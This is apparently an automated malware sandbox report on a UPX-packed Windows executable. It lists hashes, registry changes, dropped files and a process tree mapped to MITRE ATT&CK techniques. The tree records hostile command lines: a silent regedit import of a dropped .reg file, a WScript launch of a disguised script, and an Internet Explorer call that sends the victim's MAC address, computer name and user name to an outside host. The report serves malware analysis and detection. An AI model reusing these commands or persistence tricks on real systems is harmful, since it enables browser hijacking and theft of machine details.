af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372

Analysis

max time kernel
81s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
04/12/2022, 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe
Size

30KB
MD5

04cc5225beb0b03bc052167e3c435dac
SHA1

14c6851521168e856d53737cbda6300dac264c84
SHA256

af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372
SHA512

0d0017c50cbfc95caefc8b7287f234917a5da1575edca73003794464e975dca66e03be8ee4ba4e8dab7ef025018639577a5f94412d6f4a025f0e2378a0365c4a
SSDEEP

768:cInEXNC2q64k1b67RHTSydVmTwKDfefY5n76:HEXN7J4QuRLVmTXeA5O

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/880-132-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral2/memory/880-140-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral2/memory/880-142-0x0000000000400000-0x000000000042A000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\ylmqksqkr.wfoad	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe
File created	C:\Program Files\ylmqksqkr.wfoad	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe
File created	C:\Program Files\READ.TXT	WScript.exe
File created	C:\Program Files\Common Files\tk.reg	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\My.ini	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 43 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c1c10e4f0018a647bddb28409910e5ec00000000020000000000106600000001000020000000c76f87714459c600e4d55f0eafe601d27e3fae1ba3404ae0523aefb7a40565d9000000000e80000000020000200000002184e7d43d21c502c569708bdff8bb4b4989e811e82e18be5f80de17f4d61c6a20000000b90791cff11bd677a7d720761e40bfc0ec181763da3b1ddd3ed85fcae993db4c400000005157a81d4c0f0e4c2451d43eb9f4ed6ef84e6118845f1fb9ae9f0f3504c47efe6916e61ae394aa9c2e2fc1868653036b68f3e38844f03e1d5a356cc0a2fc0db8	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 306fa2b9970ad901	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001239"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{EC7A43D9-768A-11ED-AECB-D2A4FF929712} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3246624310"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3266468882"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001239"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page Redirect Cache = "c:\\about blank.htm"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001239"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Local Page = "c:\\about blank.htm"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3246624310"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377222433"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3295062341"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page = "c:\\about blank.htm"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001239"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "c:\\about blank.htm"	WScript.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.qc\ = "qcfile"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Open(&O)	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command\ = "WScript.exe \"C:\\Program Files\\ylmqksqkr.wfoad\" \"%1\""	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers\	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\ShellFolder	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptHostEncode	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Edit\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe %1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\ = "Shortcuts"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptHostEncode\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R)	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "????"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\ShellFolder\Property = "10"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Open(&O)\ = "Open(&H)"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\DefaultIcon	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\ = "Shortcuts"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\NeverShowExt	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\MUIVerb = "@C:\\Windows\\System32\\wshext.dll,-4511"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\DropHandler	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "WScript.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\ = "open"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Open(&O)\Command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.qc	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit\Command	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\DefaultIcon	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Open(&O)\Command	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Ink\ = "Inkfile"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Open(&O)\Command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" c:\\about blank.htm"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\DefaultIcon	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "JScript Script File"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\Command\ = "C:\\Windows\\SysWow64\\CScript.exe \"%1\" %*"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R)\Command	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt\	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
4964	regedit.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4584	iexplore.exe
4584	iexplore.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe
4584	iexplore.exe
4584	iexplore.exe
4568	IEXPLORE.EXE
4568	IEXPLORE.EXE
4584	iexplore.exe
4584	iexplore.exe
5112	IEXPLORE.EXE
5112	IEXPLORE.EXE
5112	IEXPLORE.EXE
5112	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 880 wrote to memory of 3388	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	79
PID 880 wrote to memory of 3388	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	79
PID 880 wrote to memory of 3388	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	79
PID 3388 wrote to memory of 4964	3388	cmd.exe	81
PID 3388 wrote to memory of 4964	3388	cmd.exe	81
PID 3388 wrote to memory of 4964	3388	cmd.exe	81
PID 880 wrote to memory of 4396	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	83
PID 880 wrote to memory of 4396	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	83
PID 880 wrote to memory of 4396	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	83
PID 4396 wrote to memory of 4584	4396	WScript.exe	84
PID 4396 wrote to memory of 4584	4396	WScript.exe	84
PID 4584 wrote to memory of 4568	4584	iexplore.exe	85
PID 4584 wrote to memory of 4568	4584	iexplore.exe	85
PID 4584 wrote to memory of 4568	4584	iexplore.exe	85
PID 880 wrote to memory of 3796	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	89
PID 880 wrote to memory of 3796	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	89
PID 880 wrote to memory of 4552	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	90
PID 880 wrote to memory of 4552	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	90
PID 880 wrote to memory of 4552	880	af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe	90
PID 4584 wrote to memory of 5112	4584	iexplore.exe	91
PID 4584 wrote to memory of 5112	4584	iexplore.exe	91
PID 4584 wrote to memory of 5112	4584	iexplore.exe	91

C:\Users\Admin\AppData\Local\Temp\af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe
"C:\Users\Admin\AppData\Local\Temp\af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "C:\Program Files\Common Files\tk.reg"
    3⤵
    - Modifies registry class
    - Runs .reg file with regedit
    PID:4964
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\SysWow64\WScript.exe" "C:\Program Files\ylmqksqkr.wfoad"
  2⤵
  - Checks computer location settings
  - Drops file in Program Files directory
  - Modifies Internet Explorer settings
  - Modifies Internet Explorer start page
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4396
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://www.58lala.com/?bymf
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4584 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:4568
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4584 CREDAT:82950 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:5112
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=D2:A4:FF:92:97:12&a_cpname=XZIOFAVD&a_user=bymf&a_locip=0.0.0.0
  2⤵
  - Modifies Internet Explorer settings
  PID:3796
- \??\c:\windows\SysWOW64\wscript.exe
  c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
  2⤵
  PID:4552

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\tk.reg

Filesize
2KB

MD5
6c57b6990432447739eec4c670c2aa91

SHA1
4c0e3533c8dd61cf4e7ca1e156740cb7495af60b

SHA256
1f720aabb4ac49de9e16db9313761eff69dec381f3281dab12db58e89b242378

SHA512
0ad8d59b755245c2405b3983d57c73f1d3c18031a7c5f447d8ff38993311f9638b8cd3a6d30a0b560f0db635b55278dc5c0a28c34cd2c5b047abd75146e733e7

Download Submit
C:\Program Files\ylmqksqkr.wfoad

Filesize
43KB

MD5
347b04cc16fade324d1a8e82ab310c08

SHA1
8db9afbfe4c9f8d20621f1d4643d6b68580bb0b2

SHA256
76cc7ef716c4c9d2ae2b87fe52525f28507ced3f3c28141410492a73f70c28a1

SHA512
b694d6fd103370ca64718cd07c5eea89a90e76e85c8b4b662a3f9bae9116d1bbd98e638feafeb3e77f3a40d063f22eb2270198b2382eac9e4fcc10d1306559f8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
a62e66dbd157955d60808bf89987bcde

SHA1
a97e8478902ac7db7fd904300304944a41afee8e

SHA256
d34e72ae586b00a60e3526f1e75677dcffa83fd33860a771ae592e7d8320cf25

SHA512
2c969c621bd5881acf47e85b3a2977b1c43dfa80887f0ab447327162d143795ff647b8ed1aec174a868c0faf1e09eb8baa6a67ea42764b65fe4416d2168e81fc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
434B

MD5
124c4cc736be6895c14ef5a0b93c4c9f

SHA1
f28a787d82127b2b4dedd843fea6d0a9ac066438

SHA256
3af6faf020f547acb939b61f4cf7c55325a1de54fed5b82c1da2da0319e730ce

SHA512
b6868d6c8f4bedc13ff9709c2e08989868e8711fab2c367fa5280919685ee19f58a9d126e67eb773c627021908367c0f98847f696ff646e9b4dc72a63242d3fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Killme.vbs

Filesize
213B

MD5
89a5eb009655f63a6029e151d0897d45

SHA1
10b483443db34d04df59f225caf1d5b059728372

SHA256
eb84f76a2afcf0bad5be9825a1c58de74b74809b82f1f33a889de6983f1ca306

SHA512
7e1d0845d5bdc8b4fe81e701c055c46e22816d55328811ce22cf34aa5b30819a3878e00223f71e5dfd062269419a7f32bab010e5672b861ab5e440f706476e4b

Download Submit
memory/880-132-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/880-140-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/880-142-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads